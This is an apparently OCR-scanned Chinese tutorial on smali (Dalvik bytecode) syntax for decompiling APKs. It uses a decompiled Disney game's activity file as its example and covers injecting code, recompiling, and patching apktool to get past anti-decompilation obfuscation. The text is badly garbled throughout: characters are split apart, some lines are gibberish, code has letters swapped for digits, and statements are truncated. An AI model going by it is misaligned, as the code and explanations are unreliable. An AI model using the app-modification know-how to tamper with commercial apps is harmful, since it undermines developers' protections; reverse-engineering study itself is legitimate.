简单 的 说 ，smali 就 是 Dalvik m c 。 它 有 自己 的 一 套 语 法 ， 下 面 即 将 介绍 ， 
如 果 有 JNI 开 发 经 验 的 童鞋 则 能 够 很 快 明白 。 


一 、Smali 的 数据 类 型 


在 smali 中 ， 数 据 类 型 和 Android 中 的 一 样 ， 只 是 对 应 的 符号 有 变化 : 


--byte 
--char 
--double 
--float 
--int 
--long 
--short 
--void 
---boolean 
[XXX- --array 
Lxxx/yyy---object 


Sots Uppy) Sn) Le) kee) Toe) 
(wg ob oh ge 
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这 里 解析 下 最 后 两 项 ， 数 组 的 表示 方式 是 : 在 基本 类 型 前 加 上 前 中 括号 中 ， 例 如 int 数 组 和 float 
数组 分 别 表示 为 : [|、[F ; 对 象 的 表示 则 以 L 作 为 开头 ， 格 式 是 LpackageName/objectName:; 
(注意 必须 有 个 分 号 跟 在 最 后 ) ， 例 如 String 对 象 在 smali 中 为 : Ljava/lang/String;， 其 中 

java/lang 对 应 java.lang 包 ，String 就 是 定义 在 该 包 中 的 一 个 对 象 。 

或 许 有 人 问 ， 既 然 类 是 用 LpackageNamey/objectName; 来 表示 ， 那 类 里 面 的 内 部 类 又 如 何在 

smali 中 引用 呢 ?答案 是 : LpackageName/objectrName$subObjectName;。 也 就 是 在 内 部 类 

前 加 “$" 符 号 ， 如 果 是 匿名 内 部 类 ， 则 使 用 parent$1、parent$2 的 方式 命名 
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函数 的 定义 一 般 为 : 
Func-Name (Para-Type1Para-Type2Para-Type3...)Return-Type 
注意 参数 与 参数 之 问 没 有 任何 分 隔 符 ， 同 样 举 几 个 例子 就 容易 明白 了 : 


1. foo ()V 
没 错 ， 这 就 是 void foo() ° 
2. foo (III)Z 
这 个 则 是 boolean foo(int, int, int) ° 
3. foo (Z[I[ILjava/lang/String;J)Ljava/lang/String; 
看 出 来 这 是 String foo (boolean, int[], int], String, long) J *8 ? 


三 、Ssmali 文 件 内 容 具 体 介 绍 


下 面 开始 进一步 分 析 smali 中 的 具体 例子 ， 取 鳄鱼 小 顽皮 中 的 WMWActivity.smali 来 分 析 ， 它 的 
内 容 大 概 是 这 样子 的 : 


1. .class public Lcom/disney/WMW/WMWActivity; 

2. .super Lcom/disney/common/BaseActivity; 

3. .source "WMWActivity.java" 

4. 

5. # interfaces 

6. .implements Lcom/burstly/lib/ui/IBurstlyAdListener; 

Tn 

8. # annot ions 

9. .annotation system Ldalvik/annotation/MemberClasses; 

10. value = { 

lake Lcom/disney/WMW/WMWActivity$MessageHandler;, 
12. Lcom/disney/WMW/WMWActivity$FinishActivityArgs; 
13. 

14. .end annotation 

15. 

16. 

17. # static fields 

18. .field private static final PREFS INSTALLATION ID:Ljava/lang/String; - "installati 
onId" 

19. // 

20. 

2:1 

22. # instance fields 

23. .field private  activityPackageName:Ljava/lang/String; 
24. //... 

25. 


28. .method static constructor <clinit>()V 


29. .locals 3 

30. 

31. .prologue 

32. Wi ao 

33. 

34. return-void 

35. .end method 

36. 

37. .method public constructor <init>()V 
38. .locals 3 

39. 

40. .prologue 

41. P nna 

42. 

43. return-void 

44. .end method 

45. 

46. .method static synthetic access$100(Lcom/disney/WMW/WMWACtivity; )V 
47. .locals 0 

48. .parameter "x0" 

49. 

50. .prologue 

51. .line 37 

52. invoke-direct {p0}, Lcom/disney/WMW/WMWActivity; ->initIap()V 
53. 

54. return-void 

55. .end method 

56. 

57. .method static synthetic access$200(Lcom/disney/WMW/WMWActivity; )Lcom/disney/commo 
n/WMWView; 

58. .locals 1 

59. .parameter "x0" 

60. 

61. .prologue 

62. .line 37 

63. iget-object v0, pO, Lcom/disney/WMW/WMWActivity;-» view:Lcom/disney/common/WMW 
View; 

64. 

65. return-object vO 

66. .end method 

67. 

682/7 T: 

69. 


70. #virtual methods 
71. .method public captureScreen()V 


72. .locals 4 
73. 

74. .prologue 
T5: AR 

76. 

Wales goto :goto 0 
78. .end method 

79. 

80. .method public didScreenCaptured()V 
81. .locals 6 
82. 

83. .prologue 
84. M aan 

85. 

86. goto :goto O 


87. .end method 


看 得 一 头 雾 水 的 话 那 是 正常 的 。 现 在 我 将 逐一 解析 ， 理 解 这 些 和 


码 的 时 候 事半功倍 。 


1、smali 中 的 继承 、 接 口 、 包 信息 


号 的 含义 令 你 在 后 面 注入 代 


首先 看 看 开头 的 几 行 : 


1] .class public Lcom/disney/WMW/WMWActivity ; 
2] .super Lcom/disney/common/BaseActivity; 
3] .source "WMWActivity.java" 


4] 

5] # interfaces 

6] .implements Lcom/burstly/lib/ui/IBurstlyAdListener; 

7] 

8] # annotations 

9] .annotation system Ldalvik/annotation/MemberClasses; 
10] value = { 

11] Lcom/disney/WMW/WMWActivity$MessageHandler;, 
12] Lcom/disney/WMW/WMWActivity$FinishActivityArgs; 
13] 


14] .end annotation 


1-3 行 定义 的 是 基本 信息 : 这 是 一 个 由 WMWActivity.java 编 译 得 到 的 smali 文 件 (第 3 行 ) ， 它 
是 com.disney.WMW 这 个 package 下 的 一 个 类 (第 1 行 ) ， 继 承 自 
com.disney.common.BaseActivity (第 2 行 ) 。 

5-6 行 定义 的 是 接口 信息 : 这 个 WMWActivity 实 现 了 一 个 com.burstly.lib.ui 这 个 package 下 (一 
个 广告 SDK) 的 IBurstyAdListener 接 口 。 8-14 行 定义 的 则 是 内 部 类 : 它 有 两 个 成 员 内 部 类 
一 -MessageHandler 和 FinishActivityArgs， 内 部 类 将 在 后 面 小 节 中 会 有 提 及 。 

注解 是 Java 的 语言 特性 ，android 系统 中 涉及 注解 的 包 有 两 个 ， 一 个 是 dalvik.annotation， 该 
程序 包 下 的 注解 不 对 外 开放 ， 仅 供 核 心 库 与 代码 测试 使 用 ; 另 一 个 是 android.annotation 。 
分 析 完 smali 文 件 开头 的 这 些 信息 ， 我 们 已 经 能 在 大 脑 中 构造 出 一 个 大 概 这 样 的 Java 文 件 : 


1. class WMWActivity extends BaseActivity implements IBurstlyAdListener{ 
2 HUE was 

3 class MessageHandler { 

4. Te eae 

3a } 

6 class FinishActivityArgs{ 

7 Vo ores 

Sr } 

9. } 


没 错 ， 这 就 是 本 来 WMWActivity.java 的 大 概 框 架 了 ， 成 员 变 量 和 元 数 信息 ? 别 急 ， 下 面 正 要 分 
析 。 


在 继续 分 析 之 前 ， 有 些 东西 需要 先 说 明 一 下 。 前 面 说 过 ，Dalvik VM 与 JVM 的 最 大 的 区 别 之 一 
就 是 Dalvik VM 是 基于 寄存 器 的 。 基 于 寄存 器 是 什么 意思 呢 ? 也 就 是 说 ， 在 smali 里 的 所 有 操作 
都 必须 经 过 寄存 器 来 进行 : 本 地 寄存 器 用 Vv 开 头 数 字 结 尾 的 符号 来 表示 ， 如 vy0、v1、v2、... 参 
数 寄存 器 则 使 用 p 开 头 数 字 结 尾 的 符号 来 表示 ， 如 p0、p1、p2、... 特 别 注意 的 是 ，p0 不 一 定 是 
函数 中 的 第 一 个 参数 ， 在 非 static 函 数 中 ，p0 代 指 “'this”，p1 表 示 函 数 的 第 一 个 参数 ，p2 代 表 函 
数 中 的 第 二 个 参数 ... 而 在 static 函 数 中 p0 才 对 应 第 一 个 参数 (因为 Java 的 static 方 法 中 没有 this 
方法 ) 。 本 地 寄存 器 没有 限制 ， 理 论 上 是 可 以 任意 使 用 的 ， 下 面 是 例子 : 


1. const/4 vO, 0x0 
2. iput-boolean v0, pO, Lcom/disney/WMW/WMWActivity; ->isRunning:Z 


在 上 面 的 两 名 中 ， 使 用 了 v0 本 地 寄存 器 ， 并 把 值 Ox0 存 到 v0 中 ， 然 后 第 二 名 用 iput-boolean 这 
个 指令 把 v0 中 的 值 存放 到 com.disney.WMW.WMWACctivity.isRunning 2 + s 5i 3E 3 Po Bp Ha 
4 : this.isRunning = false; (上 面 说 过 ， 在 非 static 函 数 中 p0 代 表 的 是 “this”， 在 这 里 就 是 
com.disney.WMW.WMWActivity 实 例 ) 。 关 于 这 两 句 话 的 具体 指令 和 含义 暂 可 不 用 理会 ， 先 
把 Dalvik VM 的 机 制 弄 明白 就 可 以 了 ， 其 实 语 法 上 和 汇编 语言 非常 相似 ， 具 体 的 指令 会 在 后 面 
逐一 介绍 。 


2、smali 中 的 成 员 变 量 


下 面 继续 介绍 有 关 成 员 变量 的 内 容 : 


1] # static fields 

2 ] .field private static final PREFS INSTALLATION ID:Ljava/lang/String; = "installati 
onId" 

S I 7 sos 

2] 

5] 

6 ] # instance fields 

7 ] .field private  activityPackageName:Ljava/lang/String; 

Bo) As at 


上 面 定义 的 static fields 和 instance fields 均 为 成 员 变 量 ， 格 式 是 field public/private [static] 
[修饰 符 (final/synthetic)] varName:< 类 型 >。 然 而 static fields 和 instance fields 还 是 有 区 别 的 ， 
当然 区 别 很 明显 ， 那 就 是 static fields 是 static 的 ， 而 instance 则 不 是 。 根 据 这 个 区 别 来 获取 这 
些 不 同 的 成 员 变 量 时 也 有 不 同 的 指令 。 一 般 来 说 ， 获 取 的 指令 有 : iget ^ sget ^ iget- 
boolean、sget-boolean、iget-object、sget-object 等 ， 操 作 的 指令 有 : iput、sput、iput- 
boolean、sput-boolean、iput-object、sput-object 等 。 没 有 "“-object" 后 组 的 表示 操作 的 成 员 变 
量 对 象 是 基本 数据 类 型 ， 带 “-object" 表 示 操 作 的 成 员 变 量 是 对 象 类 型 ， 特 别 地 ，boolean 类 型 
则 使 用 带 “-boolean” 的 指令 操作 。 

(1) ` static fields 的 指令 类 似 是 : 

sget-object v0, Lcom/disney/WMW/WMWActivity; ->PREFS_INSTALLATION_ID:Ljava/lang/String; 
sget-object 就 是 用 来 获取 变量 值 并 保存 到 紧 接 着 的 参数 的 寄存 器 中 ， 在 这 里 ， 把 上 面 出 现 的 
PREFS_INSTALLATION_ID 这 个 String 成 员 变 量 获取 并 放 到 v0 这 个 寄存 器 中 ， 注 意 : 前 面 需 
要 该 变量 所 属 的 类 的 类 型 ， 后 面 需要 加 一 个 冒号 和 该 成 员 变 量 的 类 型 ， 中 间 是 “->” 表 示 所 属 关 


(2) 、 获 取 instance fields 的 指令 与 static fields 的 基本 一 样 ， 只 是 由 于 不 是 static 交 量 ， 不 能 


仅仅 指出 该 变量 所 在 类 的 类 型 ， 还 需要 该 变量 所 在 类 的 实例 。 看 例子 : 
iget-object v0, pO, Lcom/disney/WMW/WMWActivity;-» view:Lcom/disney/common/WMWView; 


可 以 看 到 iget-object 指 令 比 sget-object 多 了 一 个 参数 ， 就 是 该 变量 所 在 类 的 实例 ， 在 这 里 就 是 
p0 即 “this”。 


(3) 、 获 取 array 的 还 有 aget 和 aget-object， 指 令 使 用 和 上 述 类 似 ， 不 细 述 。 


(4) 、put 指 令 的 使 用 和 get 指 令 是 统一 的 ， 直 接 看 例子 不 解释 : 


1. const/4 v3, 0x0 
2. sput-object v3, Lcom/disney/WMW/WMWActivity; ->globalIapHandler :Lcom/disney/config/G 
lobalPurchaseHandler; 


相当 于 : this.globallapHandler = null; (null = 0x0) 


1. .local vO, wait:Landroid/os/Message; 
2. const/4 vi, 0x2 
3. iput v1, v0, Landroid/os/Message; -»what:I 


相当 于 : wait. what = 0x2; (wait:£ Message? 3: | ) 
3^ smali Y 55 RAA A 


al 中 的 函数 和 成 员 变 量 一 样 也 分 为 两 种 类 型 ， 但 是 不 同 于 成 员 变 量 中 的 static 和 instance 之 
' 而 是 direct 和 virtual 之 分 。 那 么 direct method 和 virtual method 有 什么 区 别 呢 ? BAHL > 

direct method 就 是 private 函 数 ， 其 余 的 public 和 protected 有 函数 都 属于 virtual method。 所 以 在 
调用 函数 时 ， 有 invoke-direct，invoke-virtual， 另 外 还 有 invoke-static、 RE 
invoke-interface 等 几 种 不 同 的 指令 。 当 然 其 实 还 有 invoke-XXX/range 指令 的 ， 这 是 参数 多 于 
4 个 的 时 候 调 用 的 指令 ， 比 较 少 见 ， 了 解 下 即 可 。 

(1) 、invoke-static : 顾名思义 就 是 调用 static 有 函数 的 ， 因 为 是 static 函 数 ， 所 以 比 起 其 他 调用 
少 一 个 参数 ， 例 如 


invoke-static {}, Lcom/disney/WMW/UnlockHelper; -»unlockCrankypack()Z 


这 里 注意 到 invoke-static 后 面 有 一 对 大 括号 “{}”， 其 实 是 调用 该 方法 的 实例 + 参数 列表 ， 由 于 这 
个 方法 既 不 需 参数 也 是 static 的 ， 所 以 们 内 为 空 ， 再 看 一 个 例子 : 


1. const-string vO, "fmodex" 
2. invoke-static {v0}, Ljava/lang/System; ->loadLibrary(Ljava/lang/String; )V 


这 个 是 调用 static void System.loadLibrary(String) 来 加 载 NDK 编 译 的 so 库 用 的 方法 ， 同 样 也 是 
这 里 V0 就 是 参数 "fmodex" 了 。 

(2) 、invoke-super : 调用 父 类 方法 用 的 指令 ， 在 onCreate、onDestroy 等 方法 都 能 看 到 ， 
WE. o 

(3) ` invoke-direct : % M private £i 44) > 45] 40 

invoke-direct {p0}, Lcom/disney/WMW/WMWActivity; --getGloballIapHandler()Lcom/disney/config/! 


这 里 GlobalPurchaseHandler getGloballapHandler() 就 是 定义 在 WMWActivity 中 的 一 个 private 
函数 ， 如 果 修 改 smali 时 错 用 invoke-virtual 或 invoke-static 将 在 回 编译 后 程序 运行 时 引发 一 个 常 
见 的 VerifyError。 

(4) 、invoke-virtual : 用 于 调用 protected 或 public 函 数 ， 同 样 注意 修改 smali 时 不 要 错 用 
invoke-direct 或 invoke-static， 例 子 : 


1. sget-object v0, Lcom/disney/WMW/WMWActivity; -»shareHandler:Landroid/os/Handler; 
2. invoke-virtual {v0, v3), Landroid/os/Handler ; ->removeCallbacksAndMessages(Ljava/lan 
g/Object; )V 


这 里 相信 大 家 都 已 经 明白 了 ， 主 要 搞 清楚 v0 是 shareHandler:Landroid/os/Handler，v3 是 传递 
给 removeCallbackAndMessage 方 法 的 Ljava/lang/Object 参 数 就 可 以 了 。 


(5) 、invoke-xxxxx/range : 当 方法 的 参数 多 于 5 个 时 ( 含 5 个 ) ， 不 能 直接 使 用 以 上 的 指 
令 ， 而 是 在 后 面 加 上 “/range”， 使 用 方法 也 有 所 不 同 : 


invoke-static/range {vO .. v5}, Lcn/game189/sms/SMS; ->checkFee(Ljava/lang/String; Landroid/i 


这 个 是 电信 SDK 中 的 付费 接口 ， 需 要 传递 6 个 参数 ， 这 时 候 大 括号 内 的 参数 需要 用 省 略 形式 ， 
且 需 要 连续 (未 求证 是 否 需要 从 V0 开始 ) 。 


有 人 也 许 注意 到 ， 刚 才 看 到 的 例子 都 是 “调用 函数 "这 个 操作 而 已 ， 貌 似 没有 取 函 数 返 回 的 结果 
的 操作 ? 

在 Java 代 码 中 调用 函数 和 返回 函数 结果 是 一 条 语 台 LM 而 在 Smali 里 则 需要 分 开 来 完成 ， 
在 使 用 上 述 指令 后 ， 如 果 调 用 的 函数 返回 非 void， 那 么 还 需要 用 到 move-result (返回 基本 数 
据 类 型 ) Femove-result-object (返回 对 象 ) 指令 : 


1. const/4 v2, 0x0 

2. invoke-virtual (pO, v2}, Lcom/disney/WMW/WMWActivity; ->getPreferences(1I)Landroid/co 
ntent/SharedPreferences; 

3. move-result-object vi 


V1 保存 的 就 是 调用 getPreferences(int) 方 法 返回 的 SharedPreferences 实 例 。 


1. invoke-virtual {v2}, Ljava/lang/String;->length()I 
2. move-result v2 


V2 保存 的 则 是 调用 String.length() 返 回 的 整 型 。 


4^ smali} BRE ADAM 


下 面 开 始 介绍 函数 实体 ， 其 实 没有 什么 特别 的 地 方 ， 只 是 在 植 入 代码 时 有 一 点 需要 特别 注 
意 ， 举 例 说 明 : 


1. .method protected onDestroy()V 

2 .locals 0 

3: 

4. .prologue 

57 .line 277 

6. invoke-super {p0}, Lcom/disney/common/BaseActivity; ->onDestroy()V 
to 

8. .line 279 

9. return-void 

10. .end method 


这 是 onDestroy() 函 数 ， 它 的 作用 大 家 都 知道 。 首 先 看 到 函数 内 第 一 旬 : locals 0 * 3x 4] iE 4E € 
要 ， 标 明了 你 在 这 个 函数 中 最 少 要 用 到 的 本 地 寄存 器 的 个 数 。 在 这 里 ， 由 于 只 需要 调用 一 个 
父 类 的 onDestroy() 处 理 ， 所 以 只 需要 用 到 p0， 所 以 使 用 到 的 本 地 寄存 器 数 为 0。 如 果 不 清 楚 这 
个 规则 ， 很 容易 在 植 入 代码 后 忘记 修改 .locals 的 值 ， 那么 回 编 译 后 运行 时 将 会 得 到 一 个 
VerifyError 错 误 ， 而 且 极 难 发 现 问题 所 在 。 我 正 是 被 这 个 问题 困扰 了 很 多 次 ， 最 后 研究 发 

现 .locals 的 值 有 这 个 规律 ， 于 是 在 文档 查证 了 一 下 果然 是 这 个 问题 。 例 如 我 往 onDestroy() 增 
加 一 名 : this.existed = true:; 那 么 应 该 改 为 (注意 修改 .locals 的 值 为 1 一 一 使 用 到 了 v0 这 一 个 本 
地 寄存 器 ) 


1. .method protected onDestroy()V 

21 .locals 1 

on 

4. .prologue 

5 .line 277 

6. const/4 v0, 0x1 

7 

8 . iput-boolean v0, pO, Lcom/disney/WMW/WMWActivity; ->exited:Z 
oF 

10. invoke-super {p0}, Lcom/disney/common/BaseActivity; ->onDestroy()V 
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12. .line 279 

13. return-void 


14. .end method 


另外 注意 到 .line 这 个 标识 ， 它 是 标注 了 该 代码 在 原 Java 文 件 中 的 行 数 ， 它 也 很 有 用 ， 想 想 使 
用 eclipse 开 发 时 ， 遇 到 错误 崩溃 时 ， 在 catLog 不 是 有 提示 哪个 文件 哪 一 行 前 溃 的 么 ? Dalvik 
VM 运行 到 .line XX 时 就 将 这 个 值 存 起 来 ， 如 果 在 这 一 行 运行 时 出 错 了 ， 就 往 catLog 输 出 这 个 
值 ， 这 样 我 们 就 能 看 到 具体 是 哪 一 行 的 问题 了 。jd-gui 这 个 工具 也 是 通过 分 析 这 些 信息 将 smali 
代码 还 原 成 我 们 喜闻乐见 的 Java 代 码 的 。 当 然 ， 它 不 是 必须 的 ， 去 掉 也 没有 关系 ， 只 不 过 为 
了 方便 调试 还 是 保留 一 下 吧 。 


附录 


由 于 大 厂商 开始 使 用 混淆 防 逆 向 来 加 固 apk， 现 在 使 用 apktool 反 编 译 的 主要 两 个 错误 就 是 : 


1 » Exception in thread "main" brut.androlib.AndrolibException: Multiple res specs: attr/name 
异常 原因 : 通过 分 析 源码 知道 ， 这 个 错误 主要 是 因为 apk 做 了 混淆 操作 ， 导 致 在 反 编 译 的 过 程 
中 存 入 了 重复 的 id 值 ， 错 误 代码 : 


ResTypeSpec.java 的 addResSpec 方 法 78 行 
修复 : 在 这 个 方法 存 入 map 数 据 之 前 做 一 个 判断 操作 即 可 
public void addResSpec(ResResSpec spec) throws AndrolibException { 


/ /如 果 存 在 了 一 个 res spec 就 直接 返回 , 修复 qq 反 编 译 问题 
if(mResSpecs.containsKey(spec.getName())){ 


System.out.println("res have name:"+getName()+"/"+spec.getName()); 
return; 





if (mResSpecs.put(spec.getName(), spec) != null) { 
throw new AndrolibException(String.format("Multiple res specs: %s/%s' 
} 


} 
2 ^ Exception in thread "main" brut.androlib.AndrolibException: Could not decode arsc file 
异常 原因 : 通过 分 析 源 码 知 道 ， 这 个 错误 主要 是 因为 apk 了 做 了 resource.arsc 头 部 信息 的 修 
改 ， 导 致 在 分 析 头 部 数据 结构 的 时 候 出 错 ， 错 误 代 码 : ExtDatalnput.java 的 
skipCheckChunkTypelnt 方 法 73 行 
修复 : 修复 resource.arsc 头 部 数据 ， 修 改 skipCheckChunkTypelnt 检 测 方法 逻辑 

public void skipCheckChunkTypeInt(int expected, int possible) throws IOException { 


int got = readInt(); 
if (got == possible) { 4 一 直 检测 ， 而 且 使 用 possible 


skipCheckChunkTypeInt(expected, /*-1*/possible); 的 值 作 比较 
} else if (got != expected 


throw new IOException(String.format("Expected: @x%@8x, got: @x%@8x", expect: 
} 


Reference 


APK 反 编译 之 一 : 基础 知识 


0x01. smali 概 述 


smali 最 早起 源 于 Jasmin, 后 被 aosp 采 用 为 android 虚 拟 机 字 节 码 , 随 后 jesusfreke 开 发 了 最 有 名 
的 smali 和 baksmali 工 具 将 其 发 扬 光 大 ， 他 是 一 种 jvym 中 的 assembler 语 法 ,在 art 之 前 的 davilik 采 
用 jit 来 即时 翻译 它 运行 . 


0x011. smali&java&dex 之 问 的 关系 


摘自 quora 


But their dex files are available which would be in a totally unreadable. 

So to edit it we need to convert this .dex files to a more understandable form. 

This is where smali comes in. To make it easier to understand | can represent it like 
this: 

.dex <------------------ > .Smali <--------------------- java source code 

Converting a .dex file to smali (called baksmaling) gives us readable code in smali 
language. Now if you wonder why can't smali be converted into java source, that's 
because java is a very developed language and smali is more of an assembly based 
language. And so while going from java source to smali information is lost and that's 
why smali can't be used to completely reconstruct java source code 


0x02. smali 的 基本 类 型 


Dalvik 字 节 码 只 有 两 种 类 型 :基本 类 型 和 引用 类 型 .这 两 种 类 型 就 可 以 完整 的 表示 java 世 界 的 所 
dalvik 寄 存 器 都 是 32 位 大 小 的 ,对 于 J DD 这 种 64 位 类 型 的 需要 用 两 个 寄存 器 来 存放 ,比如 v0 与 v1 


0x03. smali 的 方法 


方法 格式 如 下 : 

Lpackage/name/ObjectName; ->MethodName(III)Z 
Lpackage/name/ObjectName; 表示 ObjectName 这 个 类 型 ,MethodName 是 具体 方法 名 ,参数 是 
int,int,int, Z 表 示 返 回 值 是 boolean 另外 一 个 复杂 一 点 的 例子 : 


method(I[[IILjava/lang/String; [Ljava/lang/Object; )Ljava/lang/String 
String method(int,int[][],int,String,Object[]) 


构造 方法 
.method public constructor <init>()V 


构造 调用 


Landroid/app/Activity; -><init>()V 


一 般 的 ,invoke 了 的 方法 表示 的 都 是 Super() 


0x04. smali 的 指令 


指令 集 : smali 指 令 大 全 
Dalvik 指令 在 调用 格式 上 模仿 了 C 语 言 的 调用 约定 .Dalvik 指令 的 语法 与 助词 符 有 如 下 特点 : 


e 参数 采用 从 目标 ( destination ) 到 源 ( source) 的 方式 

e 根据 字 节 码 的 大 小 与 类 型 不 同 ， 一 些 字 节 码 添 加 了 名 称 后 组 以 消除 歧义 > > 32 位 常 
规 类 型 的 字 节 码 未 添加 任何 后 级 。 > > 64 位 常规 类 型 的 字 节 码 添 加 -wide 后 组 > >* 
特殊 类 型 的 字 节 码 根据 具体 类 型 添加 后 级 。 它 们 可 以 是 -boolean、-byte、-char、- 
short ` -int ` -long ` -float ` -double ` -object ` -string ` -class ` -void 之 一 

e 根据 字 节 码 的 布局 与 选项 不 同 ， 一 些 字 节 码 添 加 了 字 节 码 后 级 以 消除 歧义 。 这 些 后 
级 通过 在 字 节 码 主 名 称 后 添加 斜 杠 “ / "来 分 隔 开 

e 在 指令 集 的 描述 中 ， 宽 度 值 中 每 个 字母 表示 宽度 为 4 位 


例如 这 条 指令 move-wide/from16 vAA , vBBBB 


e move 为 基础 字 节 码 ( base opcode ) 。 标 识 这 是 基本 操作 

e wide 为 名 称 后 级 ( name suffix) 。 标 识 指令 操作 的 数据 宽度 ( 64 位 ) 

e from16 X FFAA (opcode suffix ) 。 标 识 源 为 一 个 16 位 的 寄存 器 引用 变量 。 
e. VAA 为 目的 寄存 器 。 它 始终 在 源 的 前 面 ， 取 值 范 围 为 vo-v255 。 

。 vBBBB 为 源 寄存 器 。 取 值 范 围 为 vo-v65535 ° 


Dalvik 指令 集中 大 多 数 指令 用 到 了 寄存 器 作为 目的 操作 数 或 源 操作 数 ， 其 中 A/B/C/ 
D/E/F/G/H 代表 一 个 4 位 的 数值 ， 可 用 来 表示 0 一 15 的 数值 或 vo — v15 的 寄存 器 ， 而 AAT 
BB/CC/DD/EE/FF/GG/HH 代表 一 个 8 位 的 数值 ， 可 用 来 表示 0 一 255 的 数位 或 v0 
一 V255 4) 44 Z > AAAAIBBBB / CCCC / DDDD / EEEE / FFFF / GGGG / HHHH 代表 一 个 
8 位 的 数值 ， 可 用 来 表示 0 — 65535 的 数值 或 vo 一 v65535 的 寄存 器 。 


0x041. 空 指令 
nop 值 为 00, 用 来 代码 对 齐 , 无 用 处 


0x042. 数 据 操作 指令 


数据 操作 指令 为 move,move 指 令 的 原型 为 move destination,source 或 move destination , 
move 指令 根据 字 节 码 的 大 小 与 类 型 不 同 ,后 面 会 跟 上 不 同 的 后 级 . 


smali 语法 


move VA, vB 将 vB 寄存 器 的 值 赋 给 VA 寄存 器 ， 源 寄存 器 与 目的 寄存 器 都 为 4 位 . 
move vA, vB 将 vB 寄存 器 的 值 赋 给 VA 寄存 器 ， 源 寄存 器 与 目的 寄存 器 都 为 4 位 . 
move / from 16 vAA , vBBBB 将 vBBBB # 4$ Z JERA VAA 寄 存 器 ， 源 寄存 器 为 
16 位 ,目的 寄存 器 为 8 位 . 
move / 16 vAAAA , vBBBB 将 vBBBB 寄存 器 的 值 赋 给 VAAAA 寄存 器 ， 源 寄存 器 与 
目的 寄存 器 都 为 16 t. 
move-wide vA , vB 为 4 位 的 寄存 器 对 赋值 . 源 寄存 器 与 目的 寄存 器 都 为 4 位 . 
move-wide/from16 vAA , vBBBB 与 move-wide/16 vAAAA , vBBBB 实现 与 move- 
wide 相同 
move-object vA , vB 为 对 象 赋值 . 源 寄存 器 与 目的 寄存 器 都 为 4 位 . 
move-object/from16 vAA , vBBBB 为 对 象 赋值 , 源 寄存 器 为 16 位 ， 目 的 寄存 器 为 8 位 . 
move-object/16 vAAAA,vBBBB 为 对 象 赋值 源 寄 存 器 与 目的 寄存 器 都 为 16 位 . 
move-result vAA 将 上 一 个 invoke 类 型 指令 操作 的 单字 非 对 象 结果 赋 给 vAA 寄存 器 . 
move-result-wide vAA 将 上 一 个 invoke 类 型 指令 操作 的 双 字 非 对 象 结果 赋 给 vAA F 
存 器 
move-result-object vAA 将 上 一 个 invoke 类 型 指令 操作 的 对 象 结果 赋 给 vAA 寄存 器 
move-excecption VAA 保存 一 个 运行 时 发 生 的 异常 到 vAA 寄存器 .这 条 指令 必须 是 异 
常 发 生 时 的 异常 处 理 器 的 一 条 指令 .否则 的 话 ， 指 令 无 效 . 


0x043. 返 回 指令 


返回 指令 
指令 


令 指 的 是 函数 结尾 时 运行 的 最 后 一 条 指令 . 它 的 基础 字 节 码 为 retum, 共 有 以 下 四 条 返 


return-void 表 示 函 数 从 一 个 void 方法 返回 

return VAA 表 示 函 数 返回 一 个 32 位 非 对 象 类 型 的 值 ， 返 回 值 寄 存 器 为 8 位 的 寄存 器 
VAA. 

return-wide vAA A zi E 4k 24 t] — 4-64 43: FE KARA 85 RIA 84: 03 FHS 
VAA. 

return-object VAA# T à Zt 3R v] — xt RK A 65 48 38 91 48 7] 815: 0 3p 4$ BVAA. 


0x044. 2448 X 3 48 A 
数据 定义 指令 用 来 定义 程序 中 用 到 的 常量 、 s um 类 等 数据 . 它 的 基础 字 节 码 为 const. 
HX 表示 它 是 一 个 常量 数字 ，+X 表示 它 是 一 个 相对 指令 的 地 址 偏 移 ，kind@X 表示 它 是 一 个 


常量 池 索 引 值 。 
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smali 语法 


e const/4 vA,#+B 将 数值 符号 扩展 为 32 位 后 赋 给 寄存 器 VA 

e const/16 vVAA,#+BBBB 将 数值 符号 扩展 为 32 位 后 赋 给 寄存 器 VAA. 

e const vAA,#+BBBBBBBB 将 数值 赋 给 寄存 器 VAA. 

e const/high16 vAA,#+BBBB0000 将 数值 右边 零 扩 展 为 32 位 后 赋 给 寄存 器 vVAA 

e const-wide/16 vAA,#+BBBB 将 数值 符号 扩展 为 64 位 后 赋 给 寄存 器 对 VAA 

e const-wide/32 vAA.#+BBBBBBBB 将 数值 符号 扩展 为 64 位 后 赋 给 寄存 器 对 VAA 

e const-wide vAA,#+BBBBBBBBBBBBBBBB 将 数值 赋 给 寄存 器 对 VAA 

e const-wide/high16 vAA,#+BBBBO00000000000 将 数值 右边 零 扩 展 为 64 位 后 赋 给 寄 
存 器 对 VAA 

e const-string vAA,string@BBBB 通过 字符 串 索引 构造 一 个 字符 串 并 赋 给 寄存 器 VAA. 

e const-string/jumbo vAA,string@BBBBBBBB 通过 字符 串 索引 (RK) 构造 一 个 字符 
串 并 赋 给 寄存 器 VAAL. 

e const-class vAA,type@BBBB 通过 类 型 索引 获取 一 个 类 引用 并 赋 给 寄存 器 VAA 

e const-class/jumbo vAAAA,type@BBBBBBBB 通过 给 定 的 类 型 索引 获取 一 个 类 引用 
并 赋 给 寄存 器 VAAAA. 这 条 指令 占用 两 个 字 节 ， 值 为 Oox00ff(Android4.0 中 新 增 的 指 


4) 


0x045. 锁 指令 
锁 指 令 多 用 在 多 线程 程序 中 对 同一 对 象 的 操作 .Dalvik 指 令 集 中 有 两 条 锁 指 令 . 


e monitor-enter vVAA 为 指定 的 对 象 获取 锁 ， 
e monitor-exit vAA 释放 指定 的 对 象 的 锁 . 


0x046. 实 例 操作 指令 


与 实例 相关 的 操作 包括 实例 的 类 型 转换 、 检 查 及 新 建 等 
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e check-cast vAA,type@BBBB 将 VAA 寄 存 器 中 的 对 象 引 用 转换 成 指定 的 类 型 ， 如 果 
失败 会 抛 出 ClassCastException 蜡 常 .如 果 类 型 B 指 定 的 是 基本 类 型 ， 对 于 非 基 本 类 
型 的 A 来 说 ， 运 行 时 始终 会 失败 . 

e instance-of vA,vB,type@CCCC 判断 vB 寄存 器 中 的 对 象 引 用 是 否 可 以 转换 成 指定 的 
类 型 ， 如 果 可 以 VA 寄存 器 赋值 为 1， 否 则 vA 寄存 器 赋值 为 0. 

e new-instance vAA,type@BBBB 构造 一 个 指定 类 型 对 象 的 新 实例 ， 并 将 对 象 引 用 赋 
值 给 vAA 寄 存 器 ， 类 型 符 type 指 定 的 类 型 不 能 是 数组 类 

e check-cast/jumbo vAAAA,type@BBBBBBBB 指令 功能 与 check-cast 
VAA,type@BBBB 相 同 ， 只 是 寄存 器 值 与 指令 的 索引 取 值 范围 更 大 (Android4.0 中 新 
增 的 指令 ) 

